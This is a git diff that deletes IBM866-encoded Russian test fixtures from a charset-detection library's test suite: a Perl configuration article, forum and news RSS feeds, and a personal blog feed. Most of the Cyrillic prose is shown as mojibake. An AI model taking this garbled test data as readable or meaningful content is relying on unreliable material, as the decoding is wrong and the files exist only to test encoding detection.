¢«¥­¨¥, ¨§¬¥­ןן ט ¡«®­. ­¥ ­ד¦­® ¨¬¥גל ¢®§¬®¦­®בגל ₪ ¢ גל × ¦₪®¬ד ט ¡«®­ד ב®₪¥א¦ ג¥«ל­®¥ ¨¬ן ¢¬¥בג® ¨ב¯®«ל§®¢ ­¨ן ®₪­®£® ¨ ג®£® ¦¥ ¨¬¥­¨ ₪«ן א §­®£® ב®₪¥א¦¨¬®£®.<br /><br />­®£¨¥ ב¢®¡®₪­®-₪®בגד¯­כ¥ ב×א¨¯גכ, ×®ג®אכ¥ ן ­ ט¥« ¢ ˆ­ג¥א­¥ג גא¥¡דמג, חג®¡כ ¯®«ל§®¢ ג¥«ל ®גא¥₪ ×ג¨א®¢ « ¢¥או­ממ ח בגל ב×א¨¯ג  ¨«¨ ¢×«מח ¥¬דמ ¡¨¡«¨®ג¥×ד, ×®ג®א ן ב®₪¥א¦¨ג ג®«ל×® ×®­ה¨£דא ז¨®­­כ¥ ₪ ­­כ¥. ’ ×®© ¯®₪ו®₪ גא¥¡ד¥ג, חג®¡כ ×®­¥ח­כ© ¯®«ל§®¢ ג¥«ל §­ « ®ב­®¢כ ן§כ×  ¯א®£א ¬¬¨א®¢ ­¨ן ¨ ¯א ¢¨« ב×א¨¯ג - ®ט¨¡×  ב«®¬ ¥ג ב×א¨¯ג. «®ו¨¥ ×®­ה¨£דא ז¨®­­כ¥ ₪ ­­כ¥ ¬®£דג ¯א¨¢¥בג¨ × ­¥®¦¨₪ ­­כ¬ א¥§ד«לג ג ¬, ­® ®­¨ ­¥ ¯®«®¬ מג ¯א®£א ¬¬ד.<br /><br /> ¬®£ד ד× § גל ג¥×די¨¥ ×®­ה¨£דא ז¨®­­כ¥ ₪ ­­כ¥ ­¥ב×®«לר¬¨ ב¯®ב®¡ ¬¨ ¨ ¯®× ¦ד ג®«ל×® ®₪¨­ ¨§ ­¨ו. €או¨¢ Comprehensive Perl Archive Network (CPAN)<span style="font-weight:bold"><sup>2</sup></span> ב®₪¥א¦¨ג ­¥ב×®«ל×® ¬®₪ד«¥© ₪«ן א §¡®א  ×®­ה¨£דא ז¨®­­כו ה ©«®¢ ¢ א §«¨ח­כו ה®א¬ ג ו ¨«¨  א£ד¬¥­ג®¢ ×®¬ ­₪­®© בגא®×¨. „¨§ ©­¥אכ ₪®«¦­כ ¢כ¡¨א גל ¯®₪ו®₪, ×®ג®אכ© ד₪®¢«¥ג¢®אן¥ג ¨ו ­ד¦₪ ¬.<br /><br />®£₪  ן ¢¯¥א¢כ¥ ­ ח « ®ג₪¥«ןגל ₪ ­­כ¥ ×®­ה¨£דא ז¨¨ ®ג ¬®¨ו ב×א¨¯ג®¢, ן ¯¥א¥¡א « ­¥ב×®«ל×® ¬®₪ד«¥© ­  CPAN ¨ ®בג ­®¢¨«בן ­  ConfigReader::Simple, ×®ג®אכ© ¨ב¯®«ל§ד¥ג ¯®בגא®ח­כ© ה®א¬ ג ׫מח-§­ ח¥­¨¥. ¨ב¯®«ל§®¢ « ¥£® ­ בג®«ל×® ח בג®, חג® ­ ח « ®ג¯א ¢«ןגל ¬®¨ ¨§¬¥­¥­¨ן ¥×ד ¡¥א¨­ד (Bek Oberin),  ¢ג®אד ®א¨£¨­ «ל­®© ¢¥אב¨¨, § ג¥¬ ¯®«­®בגלמ ¢§ן« ­  ב¥¡ן ¯®₪₪¥א¦×ד ¬®₪ד«ן.<br /><br /><span style="font-style:italic">‹¨בג¨­£ 5</span>  ₪ ¯ג¨אד¥ג <span style="font-style:italic">«¨בג¨­£ 2</span> × ¨ב¯®«ל§®¢ ­¨מ ConfigReader::Simple. ב®§₪ מ ­®¢כ© ®¡ך¥×ג ×®­ה¨£דא ז¨¨, § ג¥¬ ח¨ג מ §­ ח¥­¨ן ¨§ ®¡ך¥×ג . ®₪ד«ל ¯א¥®¡א §ד¥ג ¨¬¥­  ׫מח¥© ×®­ה¨£דא ז¨¨ ¢ ¨¬¥­  ¬¥ג®₪®¢ ₪«ן ¯א®בג®£® ₪®בגד¯  (ו®גן ₪«ן ₪®בגד¯  × §­ ח¥­¨ן¬ ׫מח¥© ב ם×§®ג¨ח¥בר¬¨ ¨¬¥­ ¬¨, ×®ג®אכ¥ ­¥ ¬®£דג ¡כגל ¯א¥®¡א §®¢ ­כ ¢ ¨₪¥­ג¨ה¨× ג®אכ Perl ¯א¨ו®₪¨גבן ¨ב¯®«ל§®¢ גל ¬¥ג®₪ get()). <span style="font-style:italic">‹¨בג¨­£ 6</span> ב®₪¥א¦¨ג ×®­ה¨£דא ז¨®­­כ© ה ©«.<br /><br /><span style="font-style:italic">‹¨בג¨­£ 5: ˆב¯®«ל§®¢ ­¨¥ ConfigReader::Simple.</span><br /><div class="code"><pre>1 #!/usr/bin/perl -w -2 use strict; -3 -4 use ConfigReader::Simple; -5 use LWP::Simple; -6 use Text::Template qw(fill_in_file); -7 use XML::RSS; -8 -9 my $config = ConfigReader::Simple-&gt;new( './rss.config' ); -10 -11 my $base = $config-&gt;base; -12 my $template = $config-&gt;template; -13 my $extension = $config-&gt;extension; -14 -15 my @files = split /\s+/, $config-&gt;files; -16 -17 foreach my $url ( @files ) -18 { -19 my $file = $url; -20 -21 $file =~ s|.*/||; -22 -23 my $result = open my $fh, &quot;&gt; $base/$file.$extension&quot;; -24 -25 unless( $result ) -26 { -27 warn &quot;Could not open [$file] for writing! $!&quot;; -28 next; -29 } -30 -31 my $rss = XML::RSS-&gt;new(); -32 my $data = get( $url ); -33 $rss-&gt;parse( $data ); -34 -35 print $fh fill_in_file( $template, HASH =&gt; $rss ); -36 close $fh; -37 }</pre></div><br /><span style="font-style:italic">‹¨בג¨­£ 6: ” ©« ×®­ה¨£דא ז¨¨.</span><br /><div class="code"><pre>1 base . -2 template rss-html.tmpl -3 files http://use.perl.org/useperl.rss -4 extension html</pre></div><br /><br /><span style="font-weight:bold">4. ‡ ×«מח¥­¨¥.</span><br /><br /> ¬®£ד ד¬¥­לט¨גל א §¬¥א ¬®¨ו ¯א®£א ¬¬, ®ג₪¥«ןן ×®₪ ®ג «®£¨×¨ ¯א¥₪בג ¢«¥­¨ן ¨ ×®­ה¨£דא ז¨®­­®© ¨­ה®א¬ ז¨¨. ג® א §₪¥«¥­¨¥ ₪¥« ¥ג ¯א®£א ¬¬ד ¡®«¥¥ £¨¡×®© ¨ ¯א®בג®© ¢  ₪ ¯ג ז¨¨ × ­®¢כ¬ ®×אד¦¥­¨ן¬. ˜ ¡«®­כ ¯®§¢®«ןמג ¨§¬¥­ןגל ¢כ¢®₪,   ×®­ה¨£דא ז¨®­­כ¥ ה ©«כ ד¯א ¢«ןגל א ¡®ג®© ¯א®£א ¬¬כ ¡¥§ ¨§¬¥­¥­¨ן ×®₪ . Text::Template ¨ ConfigReader::Simple ₪¥« מג םג® ­ בג®«ל×® ¯א®בגכ¬, ­ ב×®«ל×® ¢®§¬®¦­®.<br /><br /><span style="font-weight:bold">5. ‘בכ«×¨</span><br /><br />‚ב¥ ¬®₪ד«¨, ד¯®¬¨­ ¥¬כ¥ ¢ םג®© בג גל¥, ¬®¦­® ­ ©ג¨ ­  Comprehensive Perl Archive Network (CPAN) - <a target="_blank" href="http://search.cpan.org">http://search.cpan.org</a><br /><br /><span style="font-weight:bold">6. ¡  ¢ג®א¥.</span><br /><br />א © ­ ₪¥ ”®© (brian d foy) - ¨§₪ ג¥«ל <span style="font-style:italic">The Perl Review</span>.<br /><br /><span style="font-weight:bold">א¨¬¥ח ­¨ן.</span><br /><br /><span style="font-weight:bold"><sup>1</sup></span> &quot;Simple RSS with Perl&quot; by brian d foy, The Perl Review v0 i5, November 2002, <a target="_blank" href="http://www.theperlreview.com">http://www.ThePerlReview.com</a><br /><br /><span style="font-weight:bold"><sup>2</sup></span> <a target="_blank" href="http://search.cpan.org">http://search.cpan.org</a><br /><br /><a target="_blank" href="http://www.theperlreview.com/Articles/v0i7/config.pdf">®א¨£¨­ « בג גל¨ ­  Perl Review (PDF)</a> - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-53.html - „אד£¨¥ ג¥¬כ, ב¢ן§ ­­כ¥ ב ט ¡«®­ ¬¨ ¨ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-53.html?rss - - - diff --git a/chardet/tests/IBM866/forum.template-toolkit.ru.9.xml b/chardet/tests/IBM866/forum.template-toolkit.ru.9.xml deleted file mode 100644 index eb03192..0000000 --- a/chardet/tests/IBM866/forum.template-toolkit.ru.9.xml +++ /dev/null @@ -1,55 +0,0 @@ - - - - - ”®אד¬כ Template Toolkit : §כ× ¯א®£א ¬¬¨א®¢ ­¨ן Perl - http://forum.template-toolkit.ru/view_forum/forum_id-9.html?rss - Template Toolkit - ¡כבגא ן, ¬®י­ ן ¨ א בט¨אן¥¬ ן ב¨בג¥¬  ®¡א ¡®גר ט ¡«®­®¢.   ב ©ג¥ א ¡®ג ¥ג ה®אד¬, ¢ ×®ג®א®¬ ®¡בד¦₪ מגבן ¢®¯א®בכ ¨ב¯®«ל§®¢ ­¨ן ¡¨¡«¨®ג¥×¨ ¯® א ¡®ג¥ ב ט ¡«®­ ¬¨. ’¥¬כ, ב¢ן§ ­­כ¥ ב ¯א®£א ¬¬¨א®¢ ­¨¥¬ ¢ Perl - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Sun, 4 Dec 2005 16:14:30 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ט ¡«®­כ ¢ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-119.html?rss - Sun, 4 Dec 2005 16:09:31 GMT - ¥ב¯« ג­כ© Perl-א¥₪ ×ג®א - http://forum.template-toolkit.ru/view_topic/topic_id-119.html?rss - ¥ב¯« ג­כ© Perl-א¥₪ ×ג®א ₪«ן Windows ב ¬­®¦¥בג¢¥­­כ¬¨ ¨­בגאד¬¥­ג ¬¨ ®ג« ₪ר ב×א¨¯ג®¢.<br /> -<br /> -URL § £אד§×¨: <br /> -http://www.perl-express.com/PeSetRussv245.exe<br /> -„®¬ ט­ןן בגא ­¨ז : <br /> -http://www.perl-express.com/ru/ - - mixail <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-119.html - „אד£¨¥ ג¥¬כ, ב¢ן§ ­­כ¥ ב ט ¡«®­ ¬¨ ¨ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-119.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-56.html?rss - Thu, 20 Jan 2005 10:34:47 GMT - JAPH - http://forum.template-toolkit.ru/view_topic/topic_id-56.html?rss - perl5.8<br /><div class="code"><pre>eval qq{#line $$ &quot;just another perl hacker&quot;\ndie};$@=~/j.+r/;print$&amp;;</pre></div> - - LIOL <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-56.html - „אד£¨¥ ג¥¬כ, ב¢ן§ ­­כ¥ ב ט ¡«®­ ¬¨ ¨ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-56.html?rss - - - diff --git a/chardet/tests/IBM866/greek.ru.xml b/chardet/tests/IBM866/greek.ru.xml deleted file mode 100644 index 2a68957..0000000 --- a/chardet/tests/IBM866/greek.ru.xml +++ /dev/null @@ -1,84 +0,0 @@ - - - - - - Greek.Ru - ®חג¨ ¢ב¥ ® £א¥ח¥ב×®¬ ­  אדבב×®¬. ƒא¥ז¨ן. ¨¯א - http://www.greek.ru - - - - Greek.Ru - http://www.greek.ru/ru/news/ya/grekru.gif - http://www.greek.ru - 88 - 31 - - - - ƒא¥ז¨ן ב¥£®₪­ן: €”ˆ› ’‘ ‘ ‘’ˆ’“–ˆ…‰ - http://www.greek.ru/ru/news/news_detail.php?ID=994 - ‚« בג¨ €ה¨­ ­ ח «¨ × ¬¯ ­¨מ "¯® ®£א ­¨ח¥­¨מ ¯א®בג¨גדז¨¨ ¨ ­¥§ ×®­­®©  ×ג¨¢­®בג¨ ¨­₪דבגא¨¨ ב¥×ב ". - - - - ƒא¥ז¨ן ב¥£®₪­ן: ‚ ƒא¥ז¨¨  א¥בג®¢ ­כ ח¥ג¢¥א® ¡א¨ג ­ז¥¢ §  ¨§¡¨¥­¨¥ ¢« ₪¥«לז  ®₪­®£® ¨§ ¬ £ §¨­®¢ - http://www.greek.ru/ru/news/news_detail.php?ID=996 - ‚ ƒא¥ז¨¨  א¥בג®¢ ­כ ח¥ג¢¥א® ¡א¨ג ­ז¥¢ - ¢ב¥ ח«¥­כ ®₪­®© ב¥¬ל¨, ×®ג®אכ¥ ב¨«ל­® ¨§¡¨«¨ ¢« ₪¥«לז  ­¥¡®«לט®£® ¬ £ §¨­ח¨×  ¡«¨§ "גדא¨בג¨ח¥ב×®© ¥×ר" -  ה¨­ב×®£® €×א®¯®«ן. - - - - - ¨¯א ב¥£®₪­ן: ’דאר-ר¯א¨®גכ ¯א¥₪« £ מג ®ב¢®¡®₪¨גל ¨¯א ®ג ¬¨­ - http://www.greek.ru/ru/news/news_detail.php?ID=990 - ‹¨₪¥א גדא®×-ר¯א¨®ג®¢  דה „¥­×ג ט ¢כב× § «בן §  «¨×¢¨₪ ז¨מ ¬¨­­כו ¯®«¥© ¢₪®«ל ₪¥¬ א× ז¨®­­®© «¨­¨¨, א §₪¥«ןמי¥© ®בגא®¢ ­  £א¥ח¥ב×דמ ¨ גדא¥ז×דמ ח בג¨. - - - - - ¨¯א ב¥£®₪­ן: €’’ˆ‹€ €…‘ “„€ ˆ“ 29 ‹…’ €‡€„ - http://www.greek.ru/ru/news/news_detail.php?ID=952 - ¥ב¯ד¡«¨×  ¨¯א ¨ ¢¥בל £א¥ח¥בר© ¬¨א ®ג¬¥ג¨«¨ 20 ¨מ«ן גא דא­דמ ₪ גד ב¢®¥© ¨בג®א¨¨. ®¢­® 29 «¥ג ­ § ₪ ¢ ו®₪¥ ®¯¥א ז¨¨ ָ€גג¨«  ­  ®בגא®¢ ¢כב ₪¨«¨בל גדא¥זר¥ ¢®©ב× , חג® ¯א¨¢¥«® × ¬ בב®¢®© £¨¡¥«¨ ­ ב¥«¥­¨ן ¨ ®××ד¯ ז¨¨ ב¥¢¥א­®© ח בג¨ ¨¯א . - - - - - ‘®¡כג¨ן. ‘¯¥×ג ×«¨. ‚כבג ¢×¨: ‚כבג ¢×  ָ®אבר¥ ¯דג¨ג ‘¨₪®­  ₪® •דם«¢כ. ‚§ ¨¬®ב¢ן§¨ ­ א®₪®¢ ‘א¥₪¨§¥¬­®¬®אלן ¢ 16 - 6 ¢.¢. ₪® ­. ם. - http://www.greek.ru/ru/news/news_detail.php?ID=983 - ‚ א ¬× ו ד«לגדא­®© «¨¬¯¨ ₪כ ¢ €ה¨­ ו, ¢ ד§¥¥ ¨×« ₪ב×®£® ˆב×דבבג¢  ב 3.06.03 ¯® 28.10.03 ¯א®ו®₪¨ג םג  ¢כבג ¢× . - - - - - ‘®¡כג¨ן. ‘¯¥×ג ×«¨. ‚כבג ¢×¨: ’…’ˆ‹ 95-‹…’ˆ… ƒ…—…‘ˆ‰ „ˆˆ†… - http://www.greek.ru/ru/news/news_detail.php?ID=979 - ‚ ¨מ«¥ 2003 £®₪  ¨ב¯®«­ן¥גבן 95 «¥ג ₪¨בב¥מ „¨¬¨גא¨ ₪¨ - ×®¬¯®§¨ג®אד, ₪¨א¨¦¥אד, ­ א®₪­®¬ד  אג¨בגד ‘‘‘. …£® ו®א®ט® ¯®¬­ןג ¨ «מ¡ןג ¢ ®«לט®¬ ג¥ גא¥, £₪¥ ®­ א ¡®ג « ב 1968 £®₪ . - - - - - דג¥ט¥בג¢¨ן ¨ גדא¨§¬: א® ®₪®ב - http://www.greek.ru/ru/greece/impression/detail.php?ID=986 - ¨×®£₪  ¥י¥ ב®«­ז¥ ­¥ ¯®₪­¨¬ «®בל ג × ¢כב®×® ­ ₪ םג¨¬ ®בגא®¢®¬. ­® ®¡­¨¬ «® ב¢®¨¬¨ ­¥¦­כ¬¨ אד× ¬¨ ×אכטד × ¦₪®£® ₪®¬ , × ¦₪כ© «¨בג®ח¥×, × ¦₪דמ × ¯¥«ל×ד ¢®₪כ ¢ ב®«¥­®¬ ¬®א¥. P.S. םג  ב× §×  ¯®ב¢ןי ¥גבן ב ¬®¬ד ב× §®ח­®¬ד ¬¥בגד ¢ ¬¨א¥ ®בגא®¢ד ®₪®ב :))) - - - - - «¨¬¯¨©בר¥ ¨£אכ 2004: ‹¥ג­ןן «¨¬¯¨ ₪ -2004 ¯א¥ג¥­₪ד¥ג ­  א¥×®א₪ - http://www.greek.ru/ru/news/news_detail.php?ID=958 - ‚ «¥ג­¥© «¨¬¯¨ ₪¥-2004, ×®ג®א ן ¯א®©₪¥ג ¢ €ה¨­ ו, ¡ד₪דג דח בג¢®¢ גל ב¯®אגב¬¥­כ ¨§ 201 בגא ­כ. - - - - - ˆבג®א¨ן. ד«לגדא . §כ×. ד§כ× : ““‹ˆ€: “‘‘ˆ‰ €„ˆ€‹ - http://www.greek.ru/ru/news/news_detail.php?ID=991 - ‚® ¢ב¥¬ ¬¨א¥ ¥בגל ג®«ל×® ®₪­  ¦¥­י¨­ - ₪¬¨א «. א¨ח¥¬,  ₪¬¨א « ®בב¨©ב×®£® ה«®ג . ˆ ®­  £א¥ח ­× , ‹ ב× א¨­  ד¡ד«¨­ , £¥א®¨­ן ®ב¢®¡®₪¨ג¥«ל­®© ¡®אל¡כ £א¥ח¥ב×®£® ­ א®₪  ב גדא× ¬¨. ­  ג®¦¥, × × ¨ א«®¢כ, ב ®בגא®¢  ‘¯¥ז¥ב... - - - - diff --git a/chardet/tests/IBM866/intertat.ru.xml b/chardet/tests/IBM866/intertat.ru.xml deleted file mode 100644 index db64c88..0000000 --- a/chardet/tests/IBM866/intertat.ru.xml +++ /dev/null @@ -1,6 +0,0 @@ - - -¥ב¯ד¡«¨× ­ב× ן ם«¥×גא®­­ ן £ §¥ג  Intertat.RU“חא¥₪¨ג¥«¥¬ € ƒ Intertat.RU ן¢«ן¥גבן × ¡¨­¥ג ¨­¨בגא®¢ ¥ב¯ד¡«¨×¨ ’ ג אבג ­. "Intertat.RU" ב®§₪ ­  ®בג ­®¢«¥­¨¥¬ א ¢¨ג¥«לבג¢  ¥ב¯ד¡«¨×¨ ’ ג אבג ­ ב®£« ב­® “× §ד א¥§¨₪¥­ג  ’ ¢ 2001 £®₪ד. ‡ א¥£¨בגא¨א®¢ ­® ¨­¨בג¥אבג¢®¬ ¯¥ח ג¨ ¨ ג¥«¥א ₪¨®¢¥י ­¨ן ”. ‘¢¨₪¥ג¥«לבג¢® ® א¥£¨בגא ז¨¨ ‘ˆ « \ No newline at end of file diff --git a/chardet/tests/IBM866/janulalife.blogspot.com.xml b/chardet/tests/IBM866/janulalife.blogspot.com.xml deleted file mode 100644 index 1deeefb..0000000 --- a/chardet/tests/IBM866/janulalife.blogspot.com.xml +++ /dev/null @@ -1,165 +0,0 @@ - - - - - - -JaNuLa's L1FE MOMENTS -If you love Her as much as I love Her then you won't steal Her...I never know what the future brings -But I know she'll be here with me...Don't give me names -You've got it all, took it all from me -Drove me insane -Who'd come down to earth, releasing me -Healing my wounds -So why don't you close the door when you're leaving me -Now you'll run -Running all the way back to me again... -‚ב¥ג ×¨ ®­ ¥¥ ד×א «, §­ ח¨ג ­¥ «מ¡¨«... - -tag:blogger.com,1999:blog-11182692 -2005-11-27T14:59:40Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -lucky - -2005-11-20T18:50:00+02:00 -2005-11-20T17:39:14Z -2005-11-20T17:39:14Z - -tag:blogger.com,1999:blog-11182692.post-113250835408580855 -¥א¢כ© ב­¥£... ¢ םג®¬ £®₪ד -<BODY><A HREF='http://photos1.blogger.com/blogger/7360/820/1024/collage11.jpg'><IMG SRC='http://photos1.blogger.com/blogger/7360/820/400/collage11.jpg' border=0 alt='' style='clear:all;float:left;margin: 0px 10px 10px 0px; cursor:hand'></A>&nbsp;<br /></BODY> ¥א¢כ© ב­¥£, ×®ג®אכ© ®¡ן§ ג¥«ל­® ₪®«¦¥­ א בג ןגל. ג¯א ¢«¥­­®¥ ב¬ב - ₪¥מבל, גכ א ₪  םג®¬ד ¯¥א¢®¬ד,¡¥«®¬ד, ח¨בג®¬ד ב­¥£ד :) ¯א¨­¥ב«® ב ב®¡®© ח ב ®¡י¥­¨ן ב «מ¡¨¬כ¬ ח¥«®¢¥×®¬. •®חד «¨ ן ¢¨₪¥גל ג¥¡ן ¢ א¥¬­¥? „ , ×®­¥ח­®, ­ ¢¥א­®¥, ב×®א® ¡ד₪ד, ג®ח­®. :) ’ × ­¥«¥¯® ­ בגד¯ גל ­  םג®ג ח¨בגכ©, ¡¥«כ© ב­¥¦­כ© ¯®×א®¢, ­¥ ­ ו®₪¨טל? ‚ב¥ ¢®×אד£ §  ח ב בג «® ח¨בגכ¬ ¨ ג × ­¥¢¨­­כ¬... ₪®«£® «¨?&nbsp;<a href='http://picasa.google.com/' target='ext'><img src='http://photos1.blogger.com/pbp.gif' alt='Posted by Picasa' style='border: 0px none ; padding: 0px; background: transparent none repeat scroll 0% 50%; -moz-background-clip: initial; -moz-background-origin: initial; -moz-background-inline-policy: initial;' align='middle' border='0' /></a> -false - - - - - -lucky - -2005-11-18T21:57:00+02:00 -2005-11-18T20:04:01Z -2005-11-18T19:57:00Z - -tag:blogger.com,1999:blog-11182692.post-113234382000287438 -א¨ב« ­® ¬­¥ ¯®ח¨ג גל... - §­ מ ¬¨א -- ®­ בג א ¨ ¯®«®­ ₪אן­¨,<br /> §­ מ ¯ג¨ז, «¥גןי¨ו ­  ¬ ­®×,<br /> §­ מ, × × §¢¥­¨ג ₪¥­ל£  ¢ × א¬ ­¥<br />ˆ × × §¢¥­¨ג ®גג®ח¥­­כ© ׫¨­®×.<br /> §­ מ, × × ¯®מג ­  םט ה®ג¥,<br /> §­ מ, × × ז¥«דמג, ­¥ «מ¡ן,<br /> §­ מ ג¥ו, ×ג® <<§ >> ¨ ג¥ו, ×ג® <<¯א®ג¨¢>>,<br /> §­ מ ¢ב¥, ­® ג®«ל×® ­¥ ב¥¡ן.<br /><br /> §­ מ ט«מו -- ®­¨ £®א₪כ, × × ₪ ¬כ,<br /> §­ מ ₪ ¬ -- ®­¨ ₪¥ט¥¢«¥ ט«מו,<br /> §­ מ ג®, ® ח¥¬ ¬®«ח ג £®₪ ¬¨,<br /> §­ מ ג®, חג® ¯א®¨§­®בןג ¢ב«דו,<br /> §­ מ, × × §¥א­® ׫ממג ¯ ¢«¨­כ<br />ˆ × × ¢®א®­כ גאד¯כ ג¥א¥¡ןג,<br /> §­ מ ¦¨§­ל -- ®­  ­¥ ¡ד₪¥ג ₪«¨­­®©,<br /> §­ מ ¢ב¥, ­® ג®«ל×® ­¥ ב¥¡ן.<br /><br /> §­ מ ¬¨א -- ¥£® בד₪¨גל «¥£×® ­ ¬,<br />‚¥₪ל ¢ב¥¬ ₪® ב®¢¥אט¥­בג¢  ₪ «¥×®,<br /> §­ מ, × × ¬®«ח ג ¯¥א¥₪ § ×®­®¬,<br />ˆ §­ מ, × × ¯®א®© ¬®«ח¨ג § ×®­.<br /> §­ מ, × × §  ו¢®בג «®¢¨גל ד₪ חד,<br />‚ב¥ו א בג®«× ¢ ¨ × ¦₪®¬ד £אד¡ן,<br /> §­ מ -- ג®«ל×® ג ×,   ­¥ ¨­ ח¥...<br /> §­ מ ¢ב¥, ­® ג®«ל×® ­¥ ב¥¡ן.<br /><br /><br /> (ב) . ‹ ₪כ¦¥­בר©, 1998<br /><a href="http://lib.ru/OLDI/poez.txt"></a> -false - - - - -lucky - -2005-11-16T03:39:00+02:00 -2005-11-16T01:49:16Z -2005-11-16T01:49:16Z - -tag:blogger.com,1999:blog-11182692.post-113210575690319678 -‚¨₪ ב ¬®¥£® ®×­ ... -<a href="http://photos1.blogger.com/blogger/7360/820/1024/collage10.jpg"><img style="CLEAR: all; FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/7360/820/400/collage10.jpg" border="0" /></a> <br /><br />...‘×¢®§ל ®¯די¥­­כ¥ ¢¥×¨<br />‚¨¦ד, ¢¨¦ד, גכ ב® ¬­®© -<br />ˆ ¢ אד×¥ ג¢®¥© ­ ¢¥×¨<br />¥®ג×אכגכ© ¢¥¥א ¬®©.<br /><br />גג®£®, חג® בג «¨ אן₪®¬<br />כ ¢ ¡« ¦¥­­כ© ¬¨£ חד₪¥ב.<br />‚ ¬¨£, ×®£₪  ­ ₪ ‹¥ג­¨¬ ‘ ₪®¬<br />¥בןז א®§®¢כ© ¢®ב×א¥ב -<br /><br />­¥ ­¥ ­ ₪® ®¦¨₪ ­¨©<br />“ ¯®בגכ«®£® ®×­ <br />ˆ ג®¬¨ג¥«ל­כו ב¢¨₪ ­¨©.<br />€ו! «מ¡®¢ל דג®«¥­ .<br /><br />’כ ב¢®¡®₪­ , ן ב¢®¡®₪­ ,<br />‡ ¢גא  «דחט¥, ח¥¬ ¢ח¥א ... <br /><br />€.€ו¬ ג®¢ &nbsp;<a href='http://picasa.google.com/' target='ext'><img src='http://photos1.blogger.com/pbp.gif' alt='Posted by Picasa' style='border: 0px none ; padding: 0px; background: transparent none repeat scroll 0% 50%; -moz-background-clip: initial; -moz-background-origin: initial; -moz-background-inline-policy: initial;' align='middle' border='0' /></a> -false - - - - -lucky - -2005-11-07T19:18:35+02:00 -2005-11-07T17:18:35Z -2005-11-07T17:18:35Z - -tag:blogger.com,1999:blog-11182692.post-113138391513670714 -interesno, znaesh' li ty, gde ona seichas? -na samo... - -
    interesno, znaesh' li ty, gde ona seichas?
    na samom dele...
    -Posted by Lucky -
    -
    -false -
    - - - -lucky - -2005-10-10T01:29:46+03:00 -2005-10-09T22:29:46Z -2005-10-09T22:29:46Z - -tag:blogger.com,1999:blog-11182692.post-112889698613197046 -*** - -
    - × ¡כ ו®ג¥«®בל ¡כגל ב ג®¡®©, ‚בס ¢א¥¬ן ב«כט גל £®«®ב ג¢®©! א¨¦ גל ג¥¡ן × ב¢®¥© £אד₪¨, ב× § גל: ?‹מ¡¨¬ ן, ¯א®בג¨!?. ‡  £«ד¯כ¥ ב«®¢  ¨ ¡®«ל, ¯א®בג¨! ‡  ₪¥גבר© ב¬¥ו ¨ ¯®ט«כ¥ ¯א¨§­ ­¨ן. „® גד¯®בג¨ ד¯®א­®¥ ¬®«ח ­¨¥. ˆ §  ¬®¨ ­¨×חס¬­כ¥ בג א ­¨ן. א®בג¨ §  םג¨ ¨₪¨®גבר¥ בג¨ו¨! ˆ §  ₪אד£¨¥, חג® ×®£₪ -ג® ¡ד₪דג! א®בג¨ §  ­¥ב¢¥אטס­­כ¥ £א¥ו¨, ‡  ­¥ב¢¥אטס­­®¥ ­¥ בד₪ןג! א®בג¨, חג® ¥בגל ן ­  §¥¬«¥. א®בג¨! ˆ, ¥ב«¨ ¢₪אד£ ­¥ ¡ד₪¥ג? א®בג¨, חג® ¯®¬­מ ® ג¥¡¥! א®בג¨, חג® ב¥א₪ז¥ ­¥ § ¡ד₪¥ג!? -
    -
    -false -
    - - - - -lucky - -2005-10-07T23:22:00+03:00 -2005-10-09T22:30:22Z -2005-10-07T20:22:54Z - -tag:blogger.com,1999:blog-11182692.post-112871657428923627 -no title - -
    Xxxx (10:29 PM) :
    ₪ , ¨ ¯א¨ו®₪¨גבן ₪¢¨£ גלבן ₪ «לט¥..
    Fallen_Angel (10:30 PM) :
    א §¢¥ חג® ¯א®בג® ₪¢¨£ גלבן (ט¨אןגלבן):-)
    ד ג¥¡ן ¥בגל ¢ב¥...¨ םג®£® ¢ב¥£® ­¥ ­ ₪®...¡¥§
    Fallen_Angel (10:30 PM) :
    ¢ב¥ ג × ג¥אן¥ג ¢בןר© ב¬כב«: ד ח¥¬ד בגא¥¬¨«בן, ® ח¥¬ ¬¥חג «...
    Xxxx (10:31 PM) :
    גכ ¯®ג¥אן«  «מ¡¨¬®£® ח¥«®¢¥× ?
    Fallen_Angel (10:32 PM) :
     £ , ד ¬¥­ן ¥£® ¯א®בג® ד¢¥«¨: ג × ¡ ­ «ל­®..
    §­ ¥טל × ×? גד¯®..ח¥א¥§  בל×ד...ן ₪® ב¨ו ¯®א ­¥ ¬®£ד ¯®­ןגל...
    Fallen_Angel (10:33 PM) :
      חג® ­¥ ¬®£ד ¯®­ןגל- ¯א®בג® ­¥ ¬®£ד ¯א®¥ו גל, × × גכ £®¢®א¨טל ₪¢¨£ גלבן ₪ «לט¥:
    ן ¯א®בג®-ב«®¦­® ­¥ ¯®­¨¬ מ...
    Xxxx (10:34 PM) :
    ’®£₪  ­¥ ד¡¨¢ ©בן, ג®ג, ×®£® ¬®¦­® ד¢¥בג¨, ­¥ ¬­®£®£® בג®¨ג. ’¢®© £« ¢­כ© ¬ד¦ח¨­  ¦₪סג ג¥¡ן ¢¯¥א¥₪¨, א ₪¨ ­¥£® ­ד¦­® ¨₪ג¨ ₪ «לט¥....
    Fallen_Angel (10:34 PM) :
    ג × ¢ב¥ ¯¥א¥ח¥א×­דג®...ן ¡כ«  ‚ב¥«¥­­®©,
    Fallen_Angel (10:35 PM) :
    §­ ¥טל ¢ ח¥¬ ¯א¨×®«...םג® ­¥ ¡כ« ¬ד¦ח¨­ ...
    ¢₪®ו­¨....¬­¥ ¨­ג¥א¥ב­  א¥ ×ז¨ן...:-)
